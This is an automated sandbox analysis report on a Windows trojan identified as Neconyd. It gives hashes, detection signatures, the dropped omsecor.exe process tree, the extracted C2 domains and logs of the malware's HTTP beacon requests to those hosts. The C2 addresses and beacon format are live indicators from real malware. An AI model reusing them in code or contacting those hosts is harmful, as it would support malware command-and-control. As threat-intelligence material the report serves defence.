Edit tour

Windows Analysis Report
bd0wJGTae5.exe

Overview

General Information

Sample name:	bd0wJGTae5.exe renamed because original name is a hash value
Original sample name:	497678a9f8adc08d092b720d45797ad245e3d9d7.exe
Analysis ID:	1546805
MD5:	cc4504807e32f91497d2c5a8dd1061f6
SHA1:	497678a9f8adc08d092b720d45797ad245e3d9d7
SHA256:	fb7cfd956db9c5dfdf55ddc48bfe2608f40dbbc91965d7791cf19f02fb931289
Tags:	exeReversingLabsuser-NDA0E
Infos:

Detection

Neconyd

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Neconyd

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

bd0wJGTae5.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\bd0wJGTae5.exe" MD5: CC4504807E32F91497D2C5A8DD1061F6)

omsecor.exe (PID: 6792 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: DC5D106C7C04B52DF85467D6D647221A)

omsecor.exe (PID: 6524 cmdline: C:\Windows\System32\omsecor.exe MD5: 1F90E0A8D463721EBCD937EF25C65D05)

omsecor.exe (PID: 764 cmdline: C:\Windows\SysWOW64\omsecor.exe /nomove MD5: 1F90E0A8D463721EBCD937EF25C65D05)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Neconyd		No Attribution	https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Neconyd.A	https://malpedia.caad.fkie.fraunhofer.de/details/win.neconyd

Malware Configuration

Threatname: Neconyd

{"C2 url": ["ht:/r.irsf.o/", "http://lousta.net/", "http://ow5dirasuek.com/", "ht:/w.irsf.o/", "http://mkkuei4kdsz.com/"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: bd0wJGTae5.exe PID: 6712	JoeSecurity_Neconyd	Yara detected Neconyd	Joe Security
Process Memory Space: omsecor.exe PID: 6792	JoeSecurity_Neconyd	Yara detected Neconyd	Joe Security
Process Memory Space: omsecor.exe PID: 6524	JoeSecurity_Neconyd	Yara detected Neconyd	Joe Security
Process Memory Space: omsecor.exe PID: 764	JoeSecurity_Neconyd	Yara detected Neconyd	Joe Security

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T16:04:11.505641+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49735	TCP
2024-11-01T16:04:49.791712+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49769	TCP

ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T16:04:16.027992+0100	2016998	1	A Network Trojan was detected	192.168.2.4	49741	193.166.255.171	80	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T16:04:07.207285+0100	2018141	1	A Network Trojan was detected	52.34.198.229	80	192.168.2.4	49733	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T16:04:07.207285+0100	2037771	1	A Network Trojan was detected	52.34.198.229	80	192.168.2.4	49733	TCP

ET MALWARE Ransom.Win32.Birele.gsg Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T16:03:56.410998+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49730	193.166.255.171	80	TCP
2024-11-01T16:04:05.127285+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49731	193.166.255.171	80	TCP
2024-11-01T16:04:05.885040+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49732	15.197.204.56	80	TCP
2024-11-01T16:04:07.185778+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49733	52.34.198.229	80	TCP
2024-11-01T16:04:15.921297+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49734	193.166.255.171	80	TCP
2024-11-01T16:04:24.544476+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49741	193.166.255.171	80	TCP
2024-11-01T16:04:25.297259+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49742	15.197.204.56	80	TCP
2024-11-01T16:04:26.234709+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49743	52.34.198.229	80	TCP
2024-11-01T16:04:34.852422+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49744	193.166.255.171	80	TCP
2024-11-01T16:04:43.451298+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49745	193.166.255.171	80	TCP
2024-11-01T16:04:43.943414+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49742	15.197.204.56	80	TCP
2024-11-01T16:04:44.887601+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49747	52.34.198.229	80	TCP
2024-11-01T16:04:53.615773+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49748	193.166.255.171	80	TCP
2024-11-01T16:05:02.221231+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49798	193.166.255.171	80	TCP
2024-11-01T16:05:03.027476+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49838	15.197.204.56	80	TCP
2024-11-01T16:05:03.976731+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49844	52.34.198.229	80	TCP
2024-11-01T16:05:12.687295+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49851	193.166.255.171	80	TCP
2024-11-01T16:05:21.282609+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49899	193.166.255.171	80	TCP
2024-11-01T16:05:22.052289+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49945	15.197.204.56	80	TCP
2024-11-01T16:05:23.012530+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49951	52.34.198.229	80	TCP
2024-11-01T16:05:31.722523+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	49958	193.166.255.171	80	TCP
2024-11-01T16:05:40.336101+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	50008	193.166.255.171	80	TCP
2024-11-01T16:05:41.083381+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	50023	15.197.204.56	80	TCP
2024-11-01T16:05:42.038840+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	50024	52.34.198.229	80	TCP
2024-11-01T16:05:50.745370+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	50025	193.166.255.171	80	TCP
2024-11-01T16:05:59.370566+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	50026	193.166.255.171	80	TCP
2024-11-01T16:06:00.210738+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	50027	15.197.204.56	80	TCP
2024-11-01T16:06:01.423576+0100	2015786	1	Malware Command and Control Activity Detected	192.168.2.4	50028	52.34.198.229	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: bd0wJGTae5.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Windows\SysWOW64\omsecor.exe	Avira: detection malicious, Label: TR/SpyVoltar.absza
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Avira: detection malicious, Label: TR/SpyVoltar.absza

Found malware configuration

Source: bd0wJGTae5.exe

Malware Configuration Extractor: Neconyd {"C2 url": ["ht:/r.irsf.o/", "http://lousta.net/", "http://ow5dirasuek.com/", "ht:/w.irsf.o/", "http://mkkuei4kdsz.com/"]}

Multi AV Scanner detection for submitted file

Source: bd0wJGTae5.exe

ReversingLabs: Detection: 86%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Windows\SysWOW64\omsecor.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: bd0wJGTae5.exe

Joe Sandbox ML: detected

Source: bd0wJGTae5.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040ABD9 FindFirstFileW,FindClose,	0_2_0040ABD9
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	0_2_00408248
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040ABD9 FindFirstFileW,FindClose,	2_2_0040ABD9
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	2_2_00408248

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49733 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49734 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49743 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49745 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49742 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49747 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49741 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49730 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49732 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49744 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49748 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49731 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49838 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49798 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49844 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49945 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49951 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49851 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49899 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49958 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50024 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50028 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50023 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50027 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50026 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50008 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50025 -> 193.166.255.171:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: ht:/r.irsf.o/
Source: Malware configuration extractor	URLs: http://lousta.net/
Source: Malware configuration extractor	URLs: http://ow5dirasuek.com/
Source: Malware configuration extractor	URLs: ht:/w.irsf.o/
Source: Malware configuration extractor	URLs: http://mkkuei4kdsz.com/

Source: global traffic	HTTP traffic detected: GET /875/87.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /740/238.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /516/243.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /546/102.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: ow5dirasuek.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /497/157.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /527/338.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /457/998.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /434/722.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473447\|1730473447\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /78/665.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /956/959.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /781/119.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /945/466.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473466\|1730473447\|9\|2\|0
Source: global traffic	HTTP traffic detected: GET /547/467.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /528/262.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /353/421.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /537/167.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473484\|1730473447\|13\|3\|0
Source: global traffic	HTTP traffic detected: GET /508/485.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /333/645.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /978/939.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /292/164.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473503\|1730473447\|16\|4\|0
Source: global traffic	HTTP traffic detected: GET /263/482.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /908/776.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /785/70.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /763/794.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473522\|1730473447\|17\|5\|0
Source: global traffic	HTTP traffic detected: GET /734/112.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /562/252.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /488/933.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /776/947.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473541\|1730473447\|18\|6\|0

Source: Joe Sandbox View	IP Address: 193.166.255.171 193.166.255.171
Source: Joe Sandbox View	IP Address: 52.34.198.229 52.34.198.229

Source: Joe Sandbox View	ASN Name: FUNETASFI FUNETASFI
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: TANDEMUS TANDEMUS

Source: Network traffic	Suricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.4:49741 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49735
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49769

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_00407036 Sleep,DeleteFileW,CreateFileW,GetLastError,SetEndOfFile,InternetOpenUrlW,CloseHandle,InternetQueryDataAvailable,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,

0_2_00407036

Source: global traffic	HTTP traffic detected: GET /875/87.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /740/238.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /516/243.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /546/102.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: ow5dirasuek.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /497/157.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /527/338.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /457/998.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /434/722.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473447\|1730473447\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /78/665.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /956/959.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /781/119.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /945/466.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473466\|1730473447\|9\|2\|0
Source: global traffic	HTTP traffic detected: GET /547/467.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /528/262.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /353/421.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /537/167.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473484\|1730473447\|13\|3\|0
Source: global traffic	HTTP traffic detected: GET /508/485.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /333/645.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
